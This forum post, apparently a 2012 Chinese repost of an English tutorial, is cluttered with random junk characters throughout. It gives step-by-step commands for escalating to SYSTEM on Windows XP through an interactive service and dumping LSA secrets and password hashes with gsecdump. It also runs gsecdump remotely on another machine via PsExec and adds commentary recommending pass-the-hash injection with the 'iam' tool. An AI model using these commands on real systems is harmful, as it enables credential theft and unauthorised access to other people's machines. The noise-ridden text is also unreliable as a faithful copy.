o get a DOS Prompt as NT system:
' T8 i r+ B. F$ a" {- Z* R4 V1 J4 y3 D; B0 l& m6 z* y6 k$ t/ k0 r
C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact Z3 Y) r! e) x. N. Q
[SC] CreateService SUCCESS' ~& d7 m* {% G
a8 `2 m& p1 f, V& b
C:\>sc start shellcmdline: [5 E4 E) ]6 N$ A. D- ^' t+ d
[SC] StartService FAILED 1053:+ I* K7 Y0 n" `/ V
% M T1 c9 u. E9 ]
The service did not respond to the start or control request in a timely fashion.
' b1 C/ @) z$ u2 z9 F# f+ r. ~( j$ w. t/ e0 x' _7 p; \. A
C:\>sc delete shellcmdline' @+ D( _) A( U( J( r
[SC] DeleteService SUCCESS
" A' ~4 b8 x4 E) x
9 S' h* a: M# K+ D/ J2 S3 j8 S, F------------% |+ g+ l! A- J, D; I
" P! Y9 K% j) J" h! K7 o
Then in the new DOS window:- u! Q' ^9 f* X0 ^0 p. `& M/ q2 a
' D0 r7 h: Q" E' P. X2 V
Microsoft Windows XP [Version 5.1.2600]
" D9 R6 n, K/ M8 K8 R(C) Copyright 1985-2001 Microsoft Corp./ w/ H3 ^# _( b. `3 O# p: Q
4 b' C g/ |) o6 h* x
C:\WINDOWS\system32>whoami
- O* Q" B& U% w0 i2 N! A9 eNT AUTHORITY\SYSTEM s# a6 D' Q( f
( ~3 s7 _2 w4 jC:\WINDOWS\system32>gsecdump -h" ]) s7 ]* k' D" B# i6 W
gsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)' \* H$ S; K6 i4 @
usage: gsecdump [options]
- Y4 e; Q$ Q# w$ @
6 l0 F% ?) O z& n5 c4 foptions:
i$ m3 B- \% o: k V, K-h [ --help ] show help, S2 ~/ I0 o }) L B
-a [ --dump_all ] dump all secrets
" C; K# q0 h; s# b-l [ --dump_lsa ] dump lsa secrets! F% u! B; m- Y$ z
-w [ --dump_wireless ] dump microsoft wireless connections
X! H7 w$ {2 ]3 x-u [ --dump_usedhashes ] dump hashes from active logon sessions) D N% Z2 _+ K# m. r4 }
-s [ --dump_hashes ] dump hashes from SAM/AD. w% q+ G x: f/ K
7 o/ M; W! G& XAlthough I like to use:- V7 x T: S+ l3 b8 { `# L# e6 e
l& y; D" M& E( X: W5 O( U
PsExec v1.83 - Execute processes remotely
! V0 G, Q2 ?/ |Copyright (C) 2001-2007 Mark Russinovich) n# F$ P6 `6 U8 T8 j
Sysinternals - 链接标记[url]www.sysinternals.com[/url]6 x) [# |& l ^1 x
. T9 h5 m" w! i) @$ K0 o ]
C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT d# l0 Q9 E" V$ B/ W: d8 @
3 x" V+ F& \$ B" z5 R1 W! T
to get the hashes from active logon sessions of a remote system.$ W0 x; C" p5 ?4 n5 B
- s" O3 A: Z( W! L0 E
These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.+ t0 ~# d7 q$ n/ L! d1 v
! C: p1 V3 ~0 u& h9 s
提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.
6 Y0 e+ ]5 G5 z9 ^5 ]8 B [原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]
6 o; F, t: w) k4 w/ p% N
5 C/ |. {0 f% P( D$ r( B3 A3 H我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。4 g2 H7 _. a j* l, Q+ y9 {+ @
|
发表于 2012-11-6 21:09:29
收藏
支持
反对